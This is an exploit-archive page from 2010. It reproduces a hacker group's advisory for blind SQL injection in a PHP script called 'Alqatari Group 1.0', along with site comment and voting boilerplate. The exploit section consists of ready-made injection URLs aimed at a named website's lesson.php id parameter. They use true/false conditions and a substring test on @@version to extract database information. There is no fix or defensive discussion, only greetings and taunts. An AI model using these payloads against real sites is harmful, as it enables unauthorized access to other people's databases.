Alqatari Group 1.0 remote blind SQL injection

2010-02-12 / 2010-02-13

Credit: null

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

 [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
[?] Alqatari group Version 1.0 Blind SQL Injection Vulnerability
==============================================================================
[?] My home: [ http://sec-r1z.com ]
[?] For Ask: [r-d@passport.com]
[?] Script: [ Alqatari group Version 1.0 ]
[?] Language: [ PHP ]
[?] Founder: [ Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] n00bz : [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..]
###########
===[ Exploit SQL Blind ]===
[&#187;]Exploit :
http://qrphp.com/lesson.php?id=246%20and%201=1 << this true
http://qrphp.com/lesson.php?id=246%20and%201=2 << this faulse
http://qrphp.com/lesson.php?id=246%20and%20substring%28@@version,1,1%29=5 << this true
http://qrphp.com/lesson.php?id=246%20and%20substring%28@@version,1,1%29=4 << this faulse
./Greetz For All my Frindes
======
#sEc-r1z.com Str1kEz y0u !

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Alqatari Group 1.0 remote blind SQL injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.